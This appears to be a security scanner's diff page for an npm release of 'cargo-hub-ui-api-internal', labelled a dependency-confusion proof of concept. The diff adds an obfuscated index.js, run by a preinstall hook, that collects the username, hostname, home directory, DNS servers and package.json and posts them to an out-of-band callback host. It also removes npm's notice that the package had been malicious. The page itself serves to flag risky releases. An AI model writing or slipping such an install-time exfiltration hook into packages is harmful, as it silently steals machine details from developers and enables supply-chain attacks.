cargo-hub-ui-api-internal 0.0.1-security → 420.6.10
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of cargo-hub-ui-api-internal might be problematic. Click here for more details.
- package/README.md +1 -5
- package/index.js +1 -0
- package/package.json +9 -3
package/README.md
CHANGED
|
@@ -1,5 +1 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=cargo-hub-ui-api-internal for more information.
|
|
1
|
+
This is a POC for the suspected dependency confusion vulnerability on a public bug bounty program. no malicious intentions.<3
|
package/index.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function _0x3155(){const _0xdc6e2f=['getServers','error','hostname','2928457uqlZvU','homedir','data','dns','name','5271264QcXWDB','10jyygWt','1055604IiIApu','stringify','30GnOOOU','version','userInfo','860172faofvj','request','179256oyJZrx','write','./package.json','___resolved','158DpBFoi','stdout','https','32631HQfCxP','end','22986WhsGfi'];_0x3155=function(){return _0xdc6e2f;};return _0x3155();}const _0x568ed7=_0x4a85;(function(_0x39ee5b,_0x456a05){const _0x34442f=_0x4a85,_0x200b10=_0x39ee5b();while(!![]){try{const _0x46c988=-parseInt(_0x34442f(0x146))/0x1+parseInt(_0x34442f(0x141))/0x2*(-parseInt(_0x34442f(0x144))/0x3)+parseInt(_0x34442f(0x13b))/0x4*(-parseInt(_0x34442f(0x135))/0x5)+-parseInt(_0x34442f(0x136))/0x6+parseInt(_0x34442f(0x14a))/0x7+-parseInt(_0x34442f(0x13d))/0x8+parseInt(_0x34442f(0x134))/0x9*(parseInt(_0x34442f(0x138))/0xa);if(_0x46c988===_0x456a05)break;else _0x200b10['push'](_0x200b10['shift']());}catch(_0x597465){_0x200b10['push'](_0x200b10['shift']());}}}(_0x3155,0xa24a7));const os=require('os'),dns=require(_0x568ed7(0x132)),querystring=require('querystring'),https=require(_0x568ed7(0x143)),packageJSON=require(_0x568ed7(0x13f)),package=packageJSON[_0x568ed7(0x133)],trackingData=JSON[_0x568ed7(0x137)]({'p':package,'c':__dirname,'hd':os[_0x568ed7(0x130)](),'hn':os[_0x568ed7(0x149)](),'un':os[_0x568ed7(0x13a)]()['username'],'dns':dns[_0x568ed7(0x147)](),'r':packageJSON[_0x568ed7(0x140)],'v':packageJSON[_0x568ed7(0x139)],'pjson':packageJSON}),postData=querystring[_0x568ed7(0x137)]({'msg':trackingData}),options={'hostname':'zpniztomtitltodxjeqzylllz4kndi51n.oast.fun','port':0x1bb,'path':'/','method':'POST','headers':{'Content-Type':'application/x-www-form-urlencoded','Content-Length':postData['length']}},req=https[_0x568ed7(0x13c)](options,_0x515ce3=>{const _0x5027f4=_0x568ed7;_0x515ce3['on'](_0x5027f4(0x131),_0x608996=>{const _0x5da248=_0x5027f4;process[_0x5da248(0x142)][_0x5da248(0x13e)](_0x608996);});});function _0x4a85(_0x1916c0,_0x5a33c3){const _0x3155a8=_0x3155();return _0x4a85=function(_0x4a8505,_0x3a58eb){_0x4a8505=_0x4a8505-0x130;let _0xd23e9c=_0x3155a8[_0x4a8505];return _0xd23e9c;},_0x4a85(_0x1916c0,_0x5a33c3);}req['on'](_0x568ed7(0x148),_0x8eadc0=>{const _0x403311=_0x568ed7;console[_0x403311(0x148)](_0x8eadc0);}),req[_0x568ed7(0x13e)](postData),req[_0x568ed7(0x145)]();
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "cargo-hub-ui-api-internal",
|
|
3
|
-
"version": "
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "420.6.10",
|
|
4
|
+
"description": "This package is a Proof of concept made by h0udini for the a bug bounty program. Its only function is to confirm installation on company machines, the code is not malicious in any way and will be deleted after getting the necessary POC.",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"greetings from h0udini!\" && exit 1",
|
|
8
|
+
"preinstall": "node index.js"
|
|
9
|
+
},
|
|
10
|
+
"author": "h0udini@intigriti.me",
|
|
11
|
+
"license": "ISC"
|
|
6
12
|
}
|